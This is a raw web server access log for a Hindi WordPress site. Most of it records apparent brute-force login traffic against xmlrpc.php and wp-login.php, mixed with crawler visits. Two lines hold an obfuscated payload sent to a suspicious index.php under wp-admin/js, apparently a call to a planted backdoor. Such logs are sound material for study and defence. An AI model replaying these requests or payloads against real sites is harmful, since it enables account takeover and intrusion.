198.20.104.194 - - [20/Oct/2025:10:25:00 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:00 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
50.21.186.206 - - [20/Oct/2025:10:25:01 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:01 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:01 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:02 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:02 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:03 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:03 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:04 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:04 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:05 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:05 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:24:40 -0400] "GET /tag/very-long-hair-care-tips HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
196.251.85.75 - - [20/Oct/2025:10:25:05 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:06 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:06 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:07 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:07 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
178.33.109.195 - - [20/Oct/2025:10:25:08 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:08 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:08 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:09 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
178.33.109.195 - - [20/Oct/2025:10:25:09 -0400] "POST /wp-login.php HTTP/2.0" 200 7090 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:09 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:10 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:25:02 -0400] "GET /tag/hair-smells-bad-when-wet HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
95.111.254.218 - - [20/Oct/2025:10:25:10 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:10 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:10:22:44 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333736342p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303937303136342q3031346337363936356165356438313266366634363732323461306361343562222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
196.251.85.75 - - [20/Oct/2025:10:25:11 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
220.158.233.61 - - [20/Oct/2025:10:25:12 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:12 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:13 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
95.111.254.218 - - [20/Oct/2025:10:25:13 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
40.77.167.14 - - [20/Oct/2025:10:25:07 -0400] "GET /peels-of-bananas-control-the-increasing-weight.html/%E0%A4%95%E0%A5%87%E0%A4%B2%E0%A5%87-%E0%A4%95%E0%A5%87-%E0%A4%9B%E0%A4%BF%E0%A4%B2%E0%A4%95%E0%A5%8B%E0%A4%82-%E0%A4%AE%E0%A5%87%E0%A4%82-%E0%A4%B5%E0%A4%BF%E0%A4%9F%E0%A4%BE%E0%A4%AE%E0%A4%BF HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
220.158.233.61 - - [20/Oct/2025:10:25:13 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:14 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:14 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:15 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:15 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
194.76.27.29 - - [20/Oct/2025:10:25:16 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:16 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
2a03:2880:f800:1d:: - - [20/Oct/2025:10:24:55 -0400] "GET /tag/extra-love-hormones/ HTTP/2.0" 200 149405 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
205.196.217.53 - - [20/Oct/2025:10:25:16 -0400] "POST /xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko"
196.251.85.75 - - [20/Oct/2025:10:25:16 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
194.76.27.29 - - [20/Oct/2025:10:25:16 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:17 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:17 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:18 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
178.239.147.118 - - [20/Oct/2025:10:25:18 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:18 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:19 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
178.239.147.118 - - [20/Oct/2025:10:25:19 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:19 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:20 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:25:01 -0400] "GET /tag/eat-protein-rich-food/ HTTP/2.0" 200 - "https://hindi.blushin.com/tag/eat-protein-rich-food" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
196.251.85.75 - - [20/Oct/2025:10:25:20 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
89.117.74.114 - - [20/Oct/2025:10:25:21 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:21 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:21 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:22 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
89.117.74.114 - - [20/Oct/2025:10:25:22 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:22 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:23 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:23 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:25:15 -0400] "GET /tag/hair-care-tips-for-long-hair-for-indian-women/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
178.239.147.118 - - [20/Oct/2025:10:25:23 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:24 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
178.239.147.118 - - [20/Oct/2025:10:25:24 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:24 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:25 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:25:24 -0400] "GET /tag/hair-care-tips-for-long-hair-for-indian-women/feed/ HTTP/2.0" 200 18120 "https://hindi.blushin.com/tag/hair-care-tips-for-long-hair-for-indian-women/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
196.251.85.75 - - [20/Oct/2025:10:25:25 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:26 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:26 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:25:10 -0400] "GET /tag/hair-smells-bad-when-wet/ HTTP/2.0" 200 - "https://hindi.blushin.com/tag/hair-smells-bad-when-wet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
196.251.85.75 - - [20/Oct/2025:10:25:27 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:27 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:28 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:28 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:29 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:29 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:30 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:30 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
103.74.116.73 - - [20/Oct/2025:10:25:31 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:31 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:31 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:32 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:10:23:06 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333738362p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303937303138362q3861366637313432393236303332343338393937396264313435396135343861222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
196.251.85.75 - - [20/Oct/2025:10:25:32 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
85.208.96.200 - - [20/Oct/2025:10:25:31 -0400] "GET /tag/raksha-bandhan-2016-date/ HTTP/2.0" 200 150091 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
196.251.85.75 - - [20/Oct/2025:10:25:33 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
103.74.116.73 - - [20/Oct/2025:10:25:33 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:33 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:34 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:34 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:25:34 -0400] "GET /tag/hair-care-tips-for-long-and-thick-hair HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
196.251.85.75 - - [20/Oct/2025:10:25:35 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:35 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:36 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:25:36 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
85.208.96.200 - - [20/Oct/2025:10:24:41 -0400] "GET /tag/raksha-bandhan-2016-date/ HTTP/2.0" 200 - "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:10:25:35 -0400] "GET /tag/hair-care-tips-for-long-and-thick-hair/ HTTP/2.0" 200 149927 "https://hindi.blushin.com/tag/hair-care-tips-for-long-and-thick-hair" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
196.251.85.75 - - [20/Oct/2025:10:25:37 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
